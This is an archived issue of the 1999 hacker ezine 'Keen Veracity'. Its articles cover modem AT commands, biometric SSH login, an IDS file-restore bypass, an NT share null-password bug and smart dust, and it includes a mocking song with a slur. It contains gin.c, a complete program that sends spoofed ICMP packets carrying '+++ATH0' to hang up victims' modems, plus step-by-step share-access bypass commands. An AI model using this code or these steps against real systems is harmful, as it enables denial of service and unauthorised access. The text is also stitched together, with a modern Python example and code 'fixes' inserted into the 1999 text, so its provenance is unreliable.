💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › KV › kv09.txt captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
[Keen Veracity ASCII-art banner, not reproduced]
--------------------------------------------------------------------------------
                               I S S U E  (9)
          L e g i o n s   o f   t h e   U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------

[CONTENTS]------------------------------------------------------------[CONTENTS]
[0001]=========================[Editorial - Digital Ebola <digi@legions.org> ]
[0010]===========================[Ode to JP Part II - KrankShaft <ks@rmci.net> ]
[0011]========[Biometric Concepts in UNIX - Digital Ebola <digi@linuxpron.com> ]
[0100]====[The Senseless Guide to Modem Commands - fejed <fejed@legions.org> ]
[0101]============[Hole in CyberCop Monitor 2.0 NT - Proto <proto@legions.org> ]
[0110]==================================[Smart Dust - shekk <shekk@smurfs.com> ]
[0111]====================[More Bugs In Windows NT - Ntwak0 <wak0@legions.org> ]
[1000]===================================[Optimizing UNIX C - S <super@ce.net> ]
[1001]===================================[Hammer2K - Threx <threx@attrition.org]
[1010]=====================[Hax0ring The Slurpee - Phriction <phric@legions.org]
[1011]========================================[Keen Veracity Spam - The Readers]

[Editorial]======================================================[Digital Ebola]

Greetings and salutations. I guess this issue of Keen Veracity is going to be themed "Back in the Saddle". That's basically what it is, as we have been silent for too long now. I have received floods of emails and messages asking "Digi, what the hell is going on with LoU? Where in the hell is your website?" And here is the answer.
It's ALMOST back to better than normal. We have had some complications, but we are back on track. The website is back up, graciously hosted at my house, on a decently fast connection, and we are starting to get back in the groove of things. Legions of the Underground isn't dead, contrary to public belief, and we intend to keep it that way. We have a whole new theme, new projects, new website and new attitude. From Palm Pilot and Windows CE development, to biometrics, to the everyday root compromise, Legions is getting their act together, and this time we are not only going to raise eyebrows, but hopefully bring about some new concepts and ideas. You can expect to see a lot more of us in the future, be it Rootfest 2k, Defcon, on the net, or in your servers. We are back and ready to kick it one more time....

The way of the monk is not always a peaceful way, but a purposeful way.....

[Ode to JP Part II]=================================================[KrankShaft]

Sung to "The Distance" by Cake.

Reluctantly crouched and starting to whine,
Pelvic pumping and thumping in time.
The red light flashes, the fags get up.
Churning and burning, he yearns for a pup.
He blatantly maneuvers and backstabs for rank,
I want to run him over with a fucking tank.
Reckless and wild, I see him as he burns.
His prowess is fake and we all will learn.

As he walks through the entrance, the heads go down.
The fans get up and they get out of town.
The building is empty except for one man,
Still lying and conniving as fast as he can.

The whore had gone down but he came back up,
And long ago somebody left with a pup.
But he's lying and conniving and hugging the ferns.
And thinking of someone for whom he still burns.

He's going the distance.
He's probably doing speed.
Carolyn's all alone
In her time of need.
Because he's lying and conniving and buying out his source,
He's backstabbing and prying and doin' with his horse,
He's going the distance.
No respect, no friends, no dignity, no vine,
He's haunted by something we can all define.
With all that we've said, he feels no remorse,
Derail him, impale him with monster-truck force.
In his mind, he's still lying, still in the 3rd grade.
He's hoping in time that Carolyn's memories will fade.
Cause he's lying and conniving and selling out his source,
He's backstabbing and prying and doin' it with his horse.

The whore had gone down but he came back up,
And long ago somebody left with a pup.
But he's lying and conniving and hugging the ferns.
And thinking of someone for whom he still burns.

He's going the distance.
He's probably doing speed.
Carolyn's all alone
In her time of need.
Because he's lying and conniving and buying out his source,
He's backstabbing and prying and doin' with his horse,
He's going the distance.
He's probably doing speed.
He's going the distance.

[Biometric Concepts in UNIX]=====================================[Digital Ebola]

INTRODUCTION

In the world of today, security is a large concern of anyone in the computer industry. The model for security has been based on logins and passwords for as long as computers have existed. As of late, we have found that this model is not the best, due to compromises. Many companies have started to turn to biometrics as the solution. If you don't know what biometrics is, the concept can be best explained as user identification by unique physical features: fingerprints, retina, voice, and the size and shape of the hands. You can readily acquire such a system of authentication for local use, but it is simply that: local. What I am going to outline is the concept for remote use under UNIX and like operating systems.

Good security is tough to come by. You can secure your entire network, lock it down to the point of it being a Digital Ft. Knox. In the end, you pay for this amount of security by trading usability.
The human factor in the end will still be your main compromise, as users forget passwords, write them down for all the world to see, or are social engineered into giving them. At present, servers can be exploited in a number of different ways, be it from leaky code in a daemon, a flaw in the operating system as a whole, or user and/or admin ignorance. Even if you are on top of things and you are monitoring your systems, you still do not really know who is who, because Joe User can be logged in from anywhere, unless you have implemented trusted host policies, and even these can be bypassed depending on the skill of the attacker.

As mentioned before, biometric authentication has been implemented at local terminals. What I wish to bring to light is the possible integration through a secure shell (encrypted) tunnel. In easier to understand terms, instead of having the password, we will have biometric identification to a remote location. You are at home, and you wish to log in to the main work server. Your means of transport is SSH. You key the command to SSH to said server. An encrypted key comparison is done between server and client, the tunnel is established, and the system prompts for a biometric print. At this point you place your thumb upon the biometric pad and you are authenticated.

The advantage to this: the user is not required to know their password. If they do not know their password, they cannot change it, they cannot forget it, they cannot write it down, or be social engineered out of it. That is one less thing that the user has to keep track of, and it actually increases usability.

The down side to this is the possible capturing of a thumbprint in transit to its destination and replaying it for the authentication, although the print will be encrypted as a substream running inside of an encrypted tunnel. Bear in mind that a print, unlike a password, cannot be changed once it has been captured, so a replayable print is a worse failure than a replayable password; the server should tie each authentication to a fresh per-session challenge rather than accept the bare print.
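The replay concern above is easiest to see with both sides of the exchange written out. The following is an added example and not code from the article: it models the reader (the biometric pad) and the server, first with the print itself sent through the tunnel as the article proposes, then with a nonce challenge so that a captured message is bound to one session. The enrolled "template" is assumed to be 32 opaque bytes that both the reader and the server know, so that it can serve as an HMAC key; real fingerprint templates are fuzzy and would instead unlock a per-device key after a local match, which is out of scope here. All names and the enrolment data are constructed for the demonstration.

```python
"""Replay resistance for a remote biometric login (added example).

Scheme 1 (static): the reader ships the print; the server compares it with
the enrolled copy.  Whoever captures that message once, at a tunnel endpoint
or from a compromised client, can replay it forever, and the thumb cannot be
rotated like a password.

Scheme 2 (challenge/response): the server issues a single-use nonce; the
reader, after matching locally, answers with an HMAC over that nonce.  A
captured answer is useless once its nonce has been consumed.

Assumption: the template is modelled as opaque key bytes (constructed data).
"""
from __future__ import annotations

import hashlib
import hmac
import secrets

# Constructed sample enrolment; not real biometric data.
ENROLLED = {"alice": hashlib.sha256(b"constructed-template-for-alice").digest()}


class Reader:
    """The client-side biometric pad, holding the user's template."""

    def __init__(self, template: bytes) -> None:
        self.template = template

    def send_static(self) -> bytes:
        # Scheme 1: the print itself travels through the tunnel.
        return self.template

    def respond(self, nonce: bytes) -> bytes:
        # Scheme 2: the print never leaves the pad; only an HMAC over the
        # server's nonce does.
        return hmac.new(self.template, nonce, hashlib.sha256).digest()


class Server:
    def __init__(self, enrolled: dict[str, bytes]) -> None:
        self.enrolled = enrolled
        self.pending: set[bytes] = set()  # nonces issued but not yet used

    def auth_static(self, user: str, print_: bytes) -> bool:
        template = self.enrolled.get(user)
        return template is not None and hmac.compare_digest(template, print_)

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)
        self.pending.add(nonce)
        return nonce

    def auth_response(self, user: str, nonce: bytes, tag: bytes) -> bool:
        # Single use: anything not currently outstanding is rejected, which
        # is what defeats a replay of a captured (nonce, tag) pair.
        if nonce not in self.pending:
            return False
        self.pending.discard(nonce)
        template = self.enrolled.get(user)
        if template is None:
            return False
        expected = hmac.new(template, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag)


def run_demo() -> dict[str, bool]:
    """Play both schemes against an attacker who captured one exchange."""
    server = Server(ENROLLED)
    reader = Reader(ENROLLED["alice"])

    # Scheme 1: the captured print keeps working.
    captured_print = reader.send_static()
    static_first = server.auth_static("alice", captured_print)
    static_replay = server.auth_static("alice", captured_print)

    # Scheme 2: the captured tag dies with its nonce.
    nonce = server.challenge()
    captured_tag = reader.respond(nonce)
    cr_first = server.auth_response("alice", nonce, captured_tag)
    cr_replay_same_nonce = server.auth_response("alice", nonce, captured_tag)
    cr_replay_new_nonce = server.auth_response("alice", server.challenge(), captured_tag)

    return {
        "static_first": static_first,
        "static_replay": static_replay,
        "cr_first": cr_first,
        "cr_replay_same_nonce": cr_replay_same_nonce,
        "cr_replay_new_nonce": cr_replay_new_nonce,
    }


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name:22s} {'accepted' if ok else 'rejected'}")
```

The point of the second scheme is not the HMAC itself but where the secret lives: the pad answers challenges, and the only thing crossing the tunnel is a one-time proof. Liveness detection and the smart card or password second factor the article mentions can be layered on the same exchange.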
Of course, actually deciphering an encrypted stream and then breaking yet another layer of encryption is supposed to be impossible, but in my own experience I have seen a lot of impossible things happen. Another possible problem could be the actual amputation of the thumb and the use of it on the plate. Biometric technology has advanced to the point of detecting whether the input is "warm and alive" or not, but I doubt the technology is cheap enough for wide scale utilization. You could in theory not only rely on the biometric input, but also utilize smart card technology and passwords in tandem; as stressed before, this will bring down the usability of the system.

This technology could also be used to authenticate more than UNIX boxes; I have merely used this as an example. You could authorize any client/server connection or even wide scale LAN-to-LAN VPNs and so forth. The main idea is to make it easier for the end user to authenticate themselves, and wipe out the "human factor". Now, when discussed with a couple of my colleagues, one mentioned that the user could still balk at having to carry around a biometric device everywhere they go. This is fine; I am sure there could be a market for implementing a biometric plate upon a keyboard or laptop.

In conclusion, this system could very well work. If one wanted, they could even start a project based on these ideas, as biometric devices can be acquired for your home terminal for about 400 dollars U.S. My purpose in this writing is to stir a little creative thought, and for those who can afford the gear, a possible reality.

[The Senseless Guide to Modem Commands]==================================[fejed]

I will not be held liable for the following information; feel free to distribute it, just give reference to me, fejed. This text file contains various modem commands and a C program to use them on vulnerable targets. You will find gin.c at the end of this text file.

Contents
1. Basic AT Commands
2. Extended AT Commands
3. Result Codes

Note: _ indicates a variable, and all commands must be prefixed with AT unless specified.

Section 1: Basic AT Commands

A       Manually answer an incoming call
A/      Repeat last command executed (DO NOT PREFIX WITH AT)
B_      Select modulation standard. Example: ATB0 changes to CCITT mode.
          B0  CCITT mode
          B1  Bell mode
D_      Dial. Example: ATDT@000 dials using touch tone, waits for five seconds of silence, then dials 000.
          0-9, A-D, #, *  digits to dial
          L   last number redial
          P   pulse dialing
          T   touch tone dialing
          W   wait for second dial tone
          ,   pause
          @   wait for five seconds of silence
          !   flash
          ;   return to command mode after dialing
E_      Command echo
          E0  echo off
          E1  echo on
+++     Switch from data mode to command mode (escape sequence; no AT prefix)
H_      Hook control
          H0  Force modem on-hook (hang up)
          H1  Force modem off-hook (make busy)
I_      Identification
          I0  Display product ident code
          I1  Factory ROM checksum test
          I2  Internal memory test
          I3  Firmware ID
          I4  Reserved ID
L_      Speaker volume
          L0  Lowest speaker volume
          L1  Low speaker volume
          L2  Medium speaker volume
          L3  High speaker volume
M_      Speaker control
          M0  Internal speaker off
          M1  Internal speaker on until carrier detected
          M2  Internal speaker always on
          M3  Internal speaker on until carrier detected, off while dialing
N_      Autoscan (automode)
          N0  Disable autoscan mode
          N1  Enable autoscan mode
O_      Return online
          O0  Return to data mode
          O1  Return to data mode and initiate an equalizer retrain
P       Set pulse dial as default
Q_      Result codes
          Q0  Modem sends responses
          Q1  Modem does not send responses
Sr?     Read and display register r
Sr=n    Set register r to value n (n=0-255)
T       Set tone dial as default
V_      Response format
          V0  Numeric responses
          V1  Word responses
W_      Connect message content
          W0  Report DTE speed only
          W1  Report line speed, error correction protocol, and DTE speed
          W2  Report DCE speed only
X_      Result code set and call progress detection
          X0  Hayes Smartmodem 300 compatible responses / blind dialing
          X1  Same as X0 plus all CONNECT responses / blind dialing
          X2  Same as X1 plus dial tone detection
          X3  Same as X1 plus busy detection / blind dialing
          X4  All responses and dial tone and busy signal detection
Y_      Long space disconnect
          Y0  Modem does not send or respond to break signals
          Y1  Modem sends break signal for four seconds before disconnecting
Z_      Reset
          Z0  Reset and retrieve active profile 0
          Z1  Reset and retrieve active profile 1

Section 2: Extended AT Commands

&C_     Carrier Detect (CD) behaviour
          &C0  Force Carrier Detect signal high (ON)
          &C1  Turn on CD when remote carrier is present
&D_     DTR behaviour
          &D0  Modem ignores the DTR signal
          &D1  Modem returns to command mode after DTR toggle
          &D2  Modem hangs up, returns to command mode after the DTR toggle
          &D3  Resets modem after DTR toggle
&F      Recall factory default configuration
&G_     Guard tone
          &G0  Guard tone disabled
          &G1  Guard tone enabled
          &G2  1800 Hz guard tone
&K_     Flow control
          &K0  Disable flow control
          &K2  Unknown
          &K3  Enable RTS/CTS hardware flow control
          &K4  Enable XON/XOFF software flow control
          &K5  Enable transparent XON/XOFF flow control
          &K6  Enable both RTS/CTS and XON/XOFF flow control
&L_     Line type
          &L0  Modem is set up for dial-up operation
&M_     Operating mode
          &M0  Asynchronous operation
&P_     Pulse dial make/break ratio
          &P0  40/60 off-hook-to-on-hook ratio (for Italy, Germany)
          &P1  33/66 off-hook-to-on-hook ratio (France, Spain)
          &P2  Same as &P0 but 20 pulses per second
          &P3  Same as &P1 but 20 pulses per second
&R_     RTS/CTS behaviour
          &R0  Reserved
          &R1  CTS operates per flow control requirements
&S_     DSR behaviour
          &S0  Force DSR signal high (ON)
          &S1  Force DSR off in command mode, on in on-line mode
&T_     Diagnostic tests
          &T0  End test in progress
          &T1  Perform local analog loopback test
          &T2  Unknown
          &T3  Perform local digital loopback test
          &T4  Grant remote digital loopback test request by remote modem
          &T5  Deny remote digital loopback test request by remote modem
          &T6  Initiate a remote digital loopback test
          &T7  Perform a remote digital loopback test and self-test
          &T8  Perform a local analog loopback test and self-test
&V      Display active and stored profiles
&W_     Store profile
          &W0  Store the active profile as profile 0
          &W1  Store the active profile as profile 1
&Y_     Power-up profile
          &Y0  Configuration profile 0 active upon power on or reset
          &Y1  Configuration profile 1 active upon power on or reset
&Zn=x   Store phone number x into non-volatile RAM location n (n=0-3)
%E_     Auto-retrain
          %E0  Disable auto-retrain
          %E1  Enable auto-retrain
%L      Display line signal level
%Q      Display line signal quality
+MS?    Display the current Select Modulation settings
+MS=?   Display a list of supported Select Modulation options
+MS=a,b,c,d  Select modulation, where:
          a = modulation protocol: 0=V.21, 1=V.22, 2=V.22bis, 3=V.23, 9=V.32, 10=V.32bis, 11=V.34/V.34bis, 64=Bell 103, 69=Bell 212, 74=V.FC
          b = automode: 0=automode disabled, 1=automode enabled with V.8/V.32 Annex A
          c = minimum connection data rate (300-33600)
          d = maximum connection data rate (300-33600)

Section 3: Result Codes (numeric form as sent with V0, word form with V1)

  0  OK
  1  CONNECT
  2  RING
  3  NO CARRIER
  4  ERROR
  5  CONNECT 1200
  6  NO DIAL TONE
  7  BUSY
  8  NO ANSWER
  9  CONNECT 600
 10  CONNECT 2400
 11  CONNECT 4800
 12  CONNECT 9600
 13  CONNECT 7200
 14  CONNECT 12000
 15  CONNECT 14400
 16  CONNECT 19200
 17  CONNECT 38400
 18  CONNECT 57600
 19  CONNECT 115200
 22  CONNECT 1200TX/75RX
 23  CONNECT 75TX/1200RX
 33  FAX
 35  DATA
 40  CARRIER 300
 44  CARRIER 1200/75
 45  CARRIER 75/1200
 46  CARRIER 2400
 48  CARRIER 4800
 49  CARRIER 7200
 51  CARRIER 12000
 56  CARRIER 24000
 57  CARRIER 26400
 64  CARRIER 28800
 66  COMPRESSION: CLASS 5
 67  COMPRESSION: V.42BIS
 69  COMPRESSION: NONE
 70  PROTOCOL: NONE
 77  PROTOCOL: LAPM
 78  CARRIER 31200
 79  CARRIER 33600
 80  PROTOCOL: ALT
 83  CONNECT 31200
 84  CONNECT 33600
+F4  +FCERROR

About gin.c: the program below does not dial anything. It builds ICMP echo requests by hand (raw socket, spoofed source address, hence root) whose payload carries "+++ATH0" several times. When the target answers, the echo reply carries the same bytes back out over its modem link; a modem that honours the Hayes escape sequence in the data stream without enforcing the guard time drops into command mode and executes ATH0, hanging up the line. Modems that enforce the escape guard time (register S12) are not affected, and setting the escape character register above 127 (ATS2=255) disables the escape sequence altogether, which is the quickest defence on the modems that are affected.

--------------------------------------CUT HERE----------------------------------
/* gin.c - send spoofed ICMP echo requests whose payload carries the Hayes
 * "+++ATH0" escape-and-hangup sequence.  Must run as root (raw socket).
 * Fixes applied to the original listing: buffer sized for the timestamp
 * that is written into it, one consistent length for tot_len, checksums
 * and sendto(), zeroed ICMP id/seq/checksum fields, and the carry fold in
 * in_chksum() (the original added 0xffff instead of masking with it). */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>

#define VERSION "1.2-05.05"     /* fixed old compiler compatibility problems */
#define FRIEND  "you"

void usage(char *name);
void banner(void);
char *get_progname(char *fullname);
void done(int foo);
void gin(int sockfd, struct sockaddr_in sin, struct sockaddr_in din);
unsigned short in_chksum(u_short *buf, int len);

int main(int argc, char **argv)
{
    struct hostent *sourceinfo, *destinfo;
    struct sockaddr_in sin, din;
    int sockfd, numpackets, i;
    char *target, *source;

    banner();
    if (argc < 4)
        usage(get_progname(argv[0]));
    source = argv[1];
    target = argv[2];
    numpackets = atoi(argv[3]);
    signal(SIGINT, done);

    memset(&sin, 0, sizeof(sin));
    memset(&din, 0, sizeof(din));
    if ((sourceinfo = gethostbyname(source)) == NULL) {
        printf("cannot resolve source host!\n");
        exit(-1);
    }
    memcpy(&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length);
    sin.sin_family = AF_INET;
    if ((destinfo = gethostbyname(target)) == NULL) {
        printf("cannot resolve destination host!\n");
        exit(-1);
    }
    memcpy(&din.sin_addr, destinfo->h_addr, destinfo->h_length);
    din.sin_family = AF_INET;

    /* IPPROTO_RAW implies IP_HDRINCL: we supply the IP header ourselves */
    if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        printf("Cannot get raw socket, silly ass. You gotta be root!\n");
        exit(-1);
    }
    printf("Source Host\t\t: %s\n", inet_ntoa(sin.sin_addr));
    printf("Target Host\t\t: %s\n", inet_ntoa(din.sin_addr));
    printf("Number\t\t\t: %d\n", numpackets);
    for (i = 0; i < numpackets; i++)
        gin(sockfd, sin, din);
    printf("\n\nsent %d packet%s...done\n", numpackets, (numpackets == 1) ? "" : "s");
    return 0;
}

void usage(char *name)
{
    printf("\033[31musage: %s <source host> <dest host> <num packets>\033[0m\n\n", name);
    exit(0);
}

void banner(void)
{
    printf("\nscript [ v%s ] ", VERSION);
    printf("compiled for: %s\n\n", FRIEND);
}

char *get_progname(char *fullname)
{
    char *retval = strrchr(fullname, '/');
    return retval ? ++retval : fullname;
}

void done(int foo)
{
    puts("Exiting...\n");
    exit(1);
}

void gin(int sockfd, struct sockaddr_in sin, struct sockaddr_in din)
{
    /* the escape sequence repeated so it survives a little line noise */
    static const char ginstring[] = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
    size_t iphlen = sizeof(struct iphdr);
    size_t icplen = sizeof(struct icmphdr);
    size_t timlen = sizeof(struct timeval);
    size_t len = strlen(ginstring);
    size_t total = iphlen + icplen + timlen + len;   /* buffer, tot_len and sendto all agree */
    char *packet;
    struct iphdr *ip;
    struct icmphdr *icmp;

    packet = malloc(total);
    if (packet == NULL) {
        perror("malloc");
        exit(-1);
    }
    memset(packet, 0, total);   /* checksum fields must be zero before summing */
    ip = (struct iphdr *)packet;
    icmp = (struct icmphdr *)(packet + iphlen);

    /* payload: a timestamp (as ping does) followed by the AT string */
    gettimeofday((struct timeval *)(packet + iphlen + icplen), NULL);
    memcpy(packet + iphlen + icplen + timlen, ginstring, len);

    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->tot_len = htons(total);
    ip->id = htons(getpid() & 0xffff);
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = sin.sin_addr.s_addr;   /* spoofed source */
    ip->daddr = din.sin_addr.s_addr;
    ip->check = in_chksum((u_short *)ip, iphlen);

    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->un.echo.id = htons(getpid() & 0xffff);
    icmp->un.echo.sequence = 0;
    /* ICMP checksum covers header, timestamp and AT string */
    icmp->checksum = in_chksum((u_short *)icmp, icplen + timlen + len);

    if (sendto(sockfd, packet, total, 0, (struct sockaddr *)&din, sizeof(din)) < 0)
        perror("sendto");
    free(packet);
}

/* standard one's-complement Internet checksum */
unsigned short in_chksum(u_short *buf, int len)
{
    register int nleft = len;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
        sum += *buf++;
        nleft -= 2;
    }
    if (nleft == 1) {
        *(u_char *)&answer = *(u_char *)buf;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);   /* fold the carries into the low 16 bits */
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}
-------------------------------------------------------------------------------

[Hole in CyberCop Monitor 2.0 NT]========================================[Proto]

Lately there's been a lot of hype around IDS technology, and for the most part it works quite well if implemented properly. There are basically 2 types of IDS systems out there.
Host based and Network based. Both of them have their advantages and disadvantages, but this article is about one particular IDS product by Network Associates called CyberCop Monitor 2.0 NT. This is a hybrid host-based IDS product. For those of you who are unfamiliar with what IDS is, please refer back to kv-8 for a brief summary on IDS technology.

One of its features they claim is its ability to monitor files for illegal changes, and its ability not only to warn the admin, but also to change the file back to its original form. This makes it a great preventative measure for web admins trying to protect their web sites from being defaced.

In my testing I applied a simple rule for it to follow. I had it monitor a file I created and applied a policy for it to do 2 things upon file access:

1. Replace the file with its original form.
2. Local pop-up alert on this system being attacked.

The product works great except under one condition that I found so far, which I was shocked to find. It's nothing fancy like exploiting a particular DLL to upload the changed file; no, it's quite simpler than that. Believe it or not, to overcome this feature, all you have to do is FTP the modified file to the system with CyberCop Monitor, and although it will warn you of the modified file, it cannot automatically replace the file back to its original form. The folks over at NAI have been informed and I was assured that they are working on a solution to the problem, but at the time of this publication the hole within their product still exists.

[Smart Dust]=============================================================[shekk]

Technology is at a point where it is thought possible (and almost done) that we can have a completely independent node inside of 1 cubic mm. These "dust motes" will include power supply, circuits, communication, and sensors.
The possibilities this could bring are endless, from spying to gathering weather data. Dust motes will be able to communicate with a bi-directional radio or lasers. Protocols and systems for these dust motes to communicate with a laser network are being designed to implement a way for dust motes to talk to each other. Even the top notch radio hardware that we have in today's robust radio industry still uses up a lot of power. Because of this, they have decided to use a laser network for most communication, utilizing lasers much smaller than the laser pointers you might have seen for around 10 dollars. This means that even if one mote is not sensing very much data, they could work together in, say, a room, and collect their data together.

Right now, macro motes have been created as large scale models of the smart dust of the future. Most of them are about 1 inch long. They can have sensors for humidity, barometric pressure, tilt, vibration, magnetic fields, and light. Macro motes include a bi-directional radio, microprocessor, and a battery which will let them live about a week, and then for another 2 years with a 1% duty cycle. Other accomplishments include a 21 km range with laser, which I will talk about in more detail later. Now here is a list of the current macro motes that have been designed and tested; these are all giants compared to what dust motes are expected to be in 2001.

[List of Macro Motes with features]

- RF mote {
    RF 916.5 MHz, 5 kbps with 20 meter range.
    Sensors - 2 axis magnetometers, 2 axis accelerometers, light, temperature, pressure
  }
- Laser mote {
    Long range laser transmission of data from sensors, many kilometers in range. This is one of the motes that was used to show the range of laser transmission in the experiment to transmit weather data.
    Sensors - temperature, light, pressure, humidity.
  }
- CCR mote {
    Corner cube reflector/light receiver; communication range depends on laser.
    This is the technology that will hopefully be implemented in the smart dust of the future for communication with each other.
    Sensors - temperature
  }
- Mini mote {
    This is a miniature version of the RF mote. RF 916.5 MHz with a 10 kbps 20 meter range.
    Sensors - temperature
  }
- MALT {
    This has steerable laser beam communication with a CCD camera.
    Sensors - light
  }
- weC {
    This is the next version of the mini mote; it can be reprogrammed wirelessly, and has RF 916.5 MHz with a 10 kbps 20 meter range.
    Sensors - light, temperature.
  }
- IrDA mote {
    These can communicate with any infrared device, such as the Palm Pilot.
    Sensors - temperature
  }

Laser communication. Using an optical receiver with the CCD camera, connected to a laptop, these lasers can get analog data from any of the sensors and send it digitally to the laptop. This procedure can simultaneously receive data from about 20 nodes, using a CRC to check for accurate reception. As of now, this communication is very slow; when they were sending the weather data, they were getting about 8 bits a second.

Experiment - They stripped off the bi-directional radio, connected a laser pointer up to a weather sensing node, and had a CCD camera capturing frames to a laptop. From 21 km away they could send data with these lasers (using something to make the spot bigger). This means not only do the lasers take up less power, but they also have a much larger range than what could be imagined when it comes to broadcasting radio waves out of a cubic millimeter machine. They have already designed and fabricated sub-mm scale mirrors with 2 motors all on the same chip, which will be used for aiming the laser beams. Tests have also been conducted and found that these tiny lasers can transmit millions of photons per second. There are light detectors that can detect 1 single photon (a photon is like one packet of light; read A Brief History of Time by Stephen Hawking).
They believe that these little boogers will be able to communicate with low earth orbit satellites, which gives us even more possibilities.

HOW SO SMALL?

There is something called IC fabrication. It allows you to have a scale of, say, 1 cm long, and then image it down to the sub-millimeter scale. This is how they are carving sub-millimeter sized circuits. Here is a link to a nice picture of what a dust mote's structure will be.

http://robotics.eecs.berkeley.edu/~pister/SmartDust/figures/colormote.gif

Some accomplishments with this fabrication technique include synthetic maple seeds, where they used a honeycombed piece of silicon .1 mm thick and carved out a wing, then put a tiny piece of silicon on the bottom so that it would auto-rotate as it fell. In 2001, they should have dust motes the size of dust, small enough that they can be suspended in air just like dust, small enough that no one would notice. Little motors have already been thought of, so these motes could also be steered around.

POSSIBILITIES

These little bitches could fall into the wrong hands, and we could have a real life version of the book 1984, where the government watches us all day long and commands us to do things over speakers on a dust mote's back. Or like Screamers, where the robots take over and end up killing people, but I wouldn't worry too much about that; you and your desktop are smarter than dust motes ;) Holding back from thinking what could go wrong with advanced technology like this, there could be some very neat applications for these. You could have these monitoring things, from the goods you are shipping, or use these as controls on your fingertips with the accelerometers, for computers, or even games. Virtual reality that knows your exact motions.

Now, here are credits to the designers of smart dust, who not only are designing these neat little creatures at the University of California, but are putting up information on leeto websites for people like me to find and enjoy reading.
Without these guys' web page teqneeqs, none of this information would be coming to you right now.

Bryan Atwood
Colby Bellew
Lance Doherty
Seth Hollar
Matt Last
Brian Leibowitz
Wei Mao
Lilac Muller
Junichi Nishimoto
Dana Teasdale
Brett Warneke
Xiaoming Zhu - thank you especially for replying to my emails.

my plugs - shouts to all of gH, LoU, and a special shout to ging3r
www.pure-security.net
www.elucks.org
www.hack.co.za

[More Bugs In Windows NT]===============================================[Ntwak0]

Subject: Password problem
In NT when connecting to a share, should I say you do not need a password in some cases even if it is protected, I mean :)
Monday, December 27, 1999 by NtWaK0

Tested on NT 4.0 + SP6 + SP6a.

I will try to do it by example; in this case you will be able to repeat it.

--> I am going to map a network share, call it X:

E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.

--> I did net view to see the shared resources

E:\Tmp>net view \\1.1.1.1
Shared resources at \\1.1.1.1

Share name   Type   Used as   Comment
--------------------------------------------------------------------------------
Tmp          Disk   X:
The command completed successfully.

--> Now I copied a file to X: to use the 1.1.1.1 resources.

E:\Tmp>copy test.txt x:
        1 file(s) copied.

--> Now I delete the connection I created to 1.1.1.1 using X:

E:\Tmp>net use /delete x:
x: was deleted successfully.

--> Now I tried to recreate the connection using a NULL password, just for fun I was doing this

E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.

Logon failure: unknown user name or bad password.

E:\Tmp>

--> It is normal that I could not login. Now I did The Bug:

--> Now reconnect using the command line

E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I used Explorer to copy the same file test.txt from my drive E:\tmp to the mapped drive X:
--> I got a msg saying "The file already exists, do you want to overwrite it?" I said yes; well, it is normal, I did copy it before as you saw in the step above.
--> After copying the file in Explorer I right-clicked on X: (the mapped drive) and chose Disconnect
--> I got a msg box saying "There are currently files open on X: (connected to \\1.1.1.1\tmp). If you do not close the files before disconnecting from the network, data may be lost. Do you want to disconnect the device anyway?" Then I clicked Yes. In this case I have no more connection mapped to X:. In this case I should not be able to connect without password or username, but not true ;)
--> Next, I do not know why I tried it, I guess for fun. In a DOS window I typed

E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
The command completed successfully.

--> W00t, I was able to login, I did not believe it hehe, with no password.
--> To make sure I was not dreaming or missing sleep, I was able to repeat it like 10 times.

But if you do connect and disconnect using net use /delete x: this will work and you cannot connect with no password, unlike the Explorer case. So this is a security bug that you can reproduce in Explorer and the DOS command, and it has to follow certain steps. What do I mean by that? Well, you have to disconnect using Explorer, and when you get the msg saying "There are currently files open on X: (connected to \\1.1.1.1\tmp) blah blah...", in that case if you disconnect and reconnect right after using no password, that should work ;) But if you do it all from the command line this should not work, and that is normal. Here is an example done all by command line:

E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0
The command completed successfully.

E:\Tmp>copy test.txt x:test.txt
        1 file(s) copied.

E:\Tmp>net use /delete x:
x: was deleted successfully.

E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.

E:\Tmp>

Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
"The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and I'm not even too sure about that one" --Dennis Hughes, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)

================================================================================

Subject: IE5 and The Cool Return "Download and Installation Successful"
Friday, December 03, 1999

It was late, about 3 am, with a lot of coffee in my blood, so I decided to do some IE5 Active update to relax from what I was working on. :)

So I clicked IE5, clicked http://windowsupdate.microsoft.com/default.htm?Page=productupdates

--> Got a nice window :)

    Please Wait...
    Windows Update is customizing the product updates catalog for your computer. This is done without sending any information to Microsoft

--> IE5 came up with (main window)

